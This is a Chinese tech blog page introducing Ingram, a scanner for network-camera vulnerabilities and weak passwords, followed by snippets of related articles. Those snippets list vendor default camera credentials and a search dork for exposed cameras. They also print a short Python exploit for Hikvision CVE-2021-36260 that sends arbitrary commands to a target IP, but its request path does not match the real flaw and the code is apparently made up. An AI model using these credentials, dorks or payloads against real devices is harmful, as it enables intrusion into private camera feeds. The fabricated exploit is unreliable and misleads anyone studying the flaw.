摄像头漏洞检测

最新推荐文章于 2025-09-13 10:09:42 发布
原创 最新推荐文章于 2025-09-13 10:09:42 发布 · 2.8k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #python #网络安全

学校、商场、咖啡厅甚至一些家庭,这些设备维护不够完善的地方,总会存在网络安全隐患。对于网络摄像头设备,安全性显得尤为重要,因为它会泄露我们的隐私。然而总会有些人因为懒得打补丁,或者是使用弱口令导致摄像头被黑客造访,变成了现场直播。

这个开源的项目:Ingram 可以帮助我们快速检测网段中的摄像头设备是否存在漏洞或者弱口令问题。以便于及时修复,避免造成损失。

严厉声明:该项目仅供学习与安全检测,请大家心存正义,切勿用于非法用途。

安装:

git clone https://github.com/jorhelp/Ingram.git
cd Ingram
pip install -r requirements.txt

使用方式以及参数设置参考github

运行截图:

结果csv文件:

 运行过程中生成的摄像头快照:

 

强大的摄像头漏洞利用工具——CamOver,保障数据安全
YwkAws的博客
10-06 2528
CamOver是一款专门设计用于检测和利用摄像头漏洞的工具,旨在帮助用户发现并修复摄像头设备中的安全问题。通过使用CamOver,用户可以测试其摄像头设备的安全性,并采取适当的措施来保护其数据。总结起来,CamOver是一款功能强大的摄像头漏洞利用工具,可以帮助用户发现和修复摄像头设备中的安全问题。漏洞利用:一旦CamOver发现摄像头设备存在漏洞,用户可以选择利用这些漏洞来获取对设备的控制权。漏洞利用模块提供了针对不同漏洞的攻击代码和脚本,用户可以根据需要选择合适的漏洞利用方法。
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 7010
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
国内某厂商摄像头敏感信息泄露漏洞事件分析
12-17 1634
国内某厂商摄像头敏感信息泄露漏洞事件分析 PDF 版报告下载:国内某厂商摄像头敏感信息泄露事件分析English Version:Webcam Sensitive Information Disclosure Vulnerability Analysis 1. 事件概述 国内某家监控产品供应商和解决方案服务商旗下有多款监控摄像机以及相关的配套设备。2017年3月5日,知道...
2025年最新CVE-2017-7921漏洞复现
2303_78851087的博客
03-26 3781
2025年最新CVE-2017-7921漏洞复现
安全设备弱口令总结,收藏这篇就够了
最新发布
Javachichi的博客
09-13 1864
设备弱口令平台查询1、海康威视摄像头2、大华网络摄像机:用户名:admin,密码:8888883、天地伟业网络摄像机:用户名:Admin,密码:1111114、宇视网络摄像机 使用默认的初始用户名:admin和初始密码:admin5、台湾壹传网络摄像机 H.264产品 用户名:root 密码:passH.265系列产品 用户名:admin 密码:Admin。
CamRaptor:针对DVR摄像头漏洞利用工具
weixin_43977912的博客
10-09 1307
关于CamRaptor CamRaptor是一款针对DVR摄像头漏洞利用工具,它可以利用当前主流DVR摄像头中的多个安全漏洞,帮助广大研究人员获取目标DVR网络摄像头的管理员凭证。 功能介绍 能够利用当前主流DVR摄像头中的多个安全漏洞,例如Novo、CeNova和QSee等。 经过优化处理,支持以多线程的形式同时攻击列表中的多个目标DVR摄像头。 简单的命令行接口和API使用方法。 工具安装 由于CamRaptor使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广
城市摄像头安全漏洞
andychuen的专栏
01-02 2704
1.摄像头安全漏洞:弱口令、使用相同固件、分布广易受攻击   网络安全创新企业华顺信安,于本周四发布《网络空间测绘系列—2018年摄像头安全报告》。这是首个基于国内网络空间测绘技术的摄像头安全报告。     互联网摄像头暴露情况   报告显示,摄像头已经无所不在,全球228个国家和地区,8063个城市,2635万个摄像头暴露在公网。DDoS攻击、机构安全风险、个人隐私泄露等事件层...
网络摄像头漏洞扫描工具-Ingram
SuperherRo的博客
08-16 4054
主要针对网络摄像头漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备
海康摄像头CVE-2021-36260漏洞复现
热门推荐
剁椒鱼头没剁椒的博客
01-06 3万+
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
分析物联网监控摄像头漏洞检测方法综述及自动化.pdf
09-17
随着技术的发展和攻击手段的日益复杂,物联网监控摄像头漏洞检测与防护将是一个持续的挑战。通过研究和应用更有效的自动化检测方法,结合加强安全编码实践,可以大幅度提高物联网监控摄像头安全性,保护用户的...
网络摄像头漏洞扫描工具-Ingram,附下载链接。
白帽子黑客SuperherRo
09-23 4057
主要针对网络摄像头漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备
工具分享 | dahuaExploitGUI是一款dahua综合漏洞利用工具,一键getshell,护网必备,渗透必备。
IT软件汇
09-14 1178
工具分享 | dahuaExploitGUI是一款dahua综合漏洞利用工具,一键getshell,护网必备,渗透必备。
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
02-10
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
RayScan漏扫工具
JZJCyangfan的博客
12-16 1718
通过登录扫描可对数据库的系统表甚至字段进行安全检测。对系统存在的弱口令做检测,支持知名的协议、数据库、中间件、HTTP服务、HTTPS服务和摄像头检测如TELNET、FTP、SSH、POP3、RDP、SMTP、Oracle、MySQL、PostgreSQL、MsSQL、Sybase、Informix、HTTP、大华摄像头、华为摄像头等。支持扫描物联网设备,如主流厂商海康威视、宇视、华为、大华、Brickcom、索尼、TP-LINK、AXIS、佳能等的摄像头,三星、惠普、爱普生、佳能等厂商的打印机。
网络安全-拿下摄像头四个高危漏洞,影响数万台设备(详细案例分析)
zkaqlaoniao的博客
08-18 1211
摘要: 本文通过分析一款热销的FNKvision IP摄像头(型号FNK-GU2),揭露了四个严重安全漏洞:1)Yoosee应用后端存在SQL注入漏洞,可泄露用户数据(已修复);2)设备未保护的UART串口可直接获取Root权限;3)Root密码使用易破解的MD5-crypt算法;4)Wi-Fi密码等敏感信息明文存储于配置文件中。研究发现,尽管该设备销量近70万台,但其硬件设计、固件及后端服务均存在基础性安全隐患,凸显物联网设备安全的普遍脆弱性。作者强调此类漏洞可能被物理接触或远程攻击者利用,呼吁加强供应链
摄像头安全隐患检测和防护方法
weixin_33670713的博客
01-19 2361
针对最近课题组的小项目研究提出家用摄像头安全隐患检测和防护方案 一、第一部分先讲摄像头的渗透问题,大家可以对其中的安全问题有一个清晰地认识。 1、摄像头以及其他工控硬件的漏洞暴露问题 这里只拿摄像头做案列;针对摄像头的生产厂家,不同的设备自己不同的产品ID ,国内产品有:天地伟业、海康威视、泰科、亚安等,现在就拿其中一款亚安搜索一下 使用搜索工具Sho...
GOOGLE的摄像头漏洞
fcxiao的专栏
09-17 2575
GOOGLE的摄像头漏洞 inurl:"ViewerFrame?Mode=" GOOGLE上面输入这段代码,就可以找到有web功能的摄像头,传说全世界有好几万部。还要下载一个插件就可以偷窥人家了。 建议大家把好的地点网址贴出来分享! http://flower-center.miemasu.net ... tion&Language=1 http://210.134.20.21/ViewerFra
多个Wyze 摄像头漏洞可导致攻击者接管设备并访问视频
smellycat000的专栏
04-02 756
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士热门 Wyze Cam 设备中存在三个漏洞,可导致恶意人员执行任意代码、访问摄像头并越权读取SD卡,而距离漏洞初次发现近3年后,越权读取SD卡的问题仍未解决。这些漏洞和认证绕过 (CVE-2019-9564)、因栈缓冲区溢出导致的远程执行 (CVE-2019-12266) 和SD卡内容未认证访问(无CVE)有关。成功利用...
海康威视摄像头漏洞
03-25
### 关于海康威视摄像头安全漏洞 #### CVE-2017-7921 此漏洞涉及海康威视设备中的一个安全隐患,允许未经授权的访问者通过特定方式获取敏感数据或控制权限。该漏洞通常可以通过网络扫描工具(如FOFA)来识别目标设备并测试其是否存在已知漏洞[^1]。 #### CVE-2021-36260 这是一个更为严重的远程代码执行漏洞,存在于海康威视IP摄像机和NVR设备的固件中。由于输入参数校验不足,攻击者能够无需身份验证的情况下向受影响设备发送特制的数据包,从而触发远程命令执行行为。这一问题广泛影响多个版本的网络摄像头产品及其关联录像存储装置[^2]。 针对上述提到的CVE编号之一即`CVE-2021-36260`, 开发人员提供了相应的Python脚本作为概念证明(PoC),用于检测哪些系统可能受到威胁。有兴趣的研究员可以从指定链接下载相关文件进行学习研究[^3]: ```python import requests from urllib.parse import quote_plus def exploit(target_ip, command="id"): url = f"http://{target_ip}/system.ini?cmd={quote_plus(command)}" response = requests.get(url) if response.status_code == 200 and 'error' not in response.text.lower(): print(f"[+] Command executed successfully:\n{response.text}") else: print("[-] Failed to execute the provided command.") if __name__ == "__main__": target = input("[*] Enter Target IP Address: ") cmd = input("[*] Enter Your Desired Linux Command (default=id): ") or "id" try: exploit(target, cmd) except Exception as e: print(f"An error occurred during exploitation attempt: {e}") ``` 以上代码片段展示了如何构建URL字符串并通过GET请求尝试利用存在缺陷的服务接口达成任意指令运行的目的。请注意实际操作前需获得合法授权以免触犯法律条款。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值